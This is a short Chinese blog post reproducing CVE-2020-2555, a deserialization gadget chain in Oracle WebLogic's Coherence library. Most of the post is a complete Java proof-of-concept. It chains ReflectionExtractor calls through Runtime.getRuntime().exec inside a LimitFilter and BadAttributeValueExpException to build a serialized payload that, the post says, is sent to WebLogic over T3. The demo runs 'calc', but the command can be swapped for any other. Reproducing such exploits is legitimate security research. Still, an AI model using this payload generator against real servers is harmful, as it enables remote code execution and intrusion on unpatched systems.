CVE-2020-2555 weblogic 反序列化gadget 复现

简介

该反序列化的gadget存在与coherence包中。具体可以见分析

构造chain类似于common-collection的chain,可以照葫芦画瓢。

mvn 好像不能下载coherence包,很奇怪,直接下jar包就行。

反序列化的对象,通过t3发送给weblogic即可。所以,这个只是生成payload的工具。

poc

package org.example;

import com.tangosol.util.ValueExtractor;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import com.tangosol.util.filter.AlwaysFilter;
import com.tangosol.util.filter.LimitFilter;

import javax.management.BadAttributeValueExpException;
import java.io.*;

/*
Powered by UnicodeSec
 */

public class App 
{
    public static void main( String[] args ) throws IOException, ClassNotFoundException {
        ValueExtractor[] poc = new ValueExtractor[]{
                new ReflectionExtractor("getMethod", new Object[] {
                        "getRuntime", new Class[0] }),
                new ReflectionExtractor("invoke", new Object[] {
                        null, new Object[0] }),
                new ReflectionExtractor("exec", new String[]{"calc"})
    };
        ChainedExtractor chained = new ChainedExtractor(poc);
        LimitFilter limit = new LimitFilter(new AlwaysFilter(), 1);
        limit.setComparator(chained);
        limit.setTopAnchor(Runtime.class);
        BadAttributeValueExpException expException = new BadAttributeValueExpException(limit);

        // 序列化测试
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bytes);
        oos.writeObject(expException);
        oos.close();
        //反序列化
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes.toByteArray()));
        BadAttributeValueExpException newUser = (BadAttributeValueExpException)ois.readObject();
        System.out.println(newUser.toString());

    }
}

posted @ 2020-03-18 12:10  potatso  阅读(1704)  评论(0编辑  收藏  举报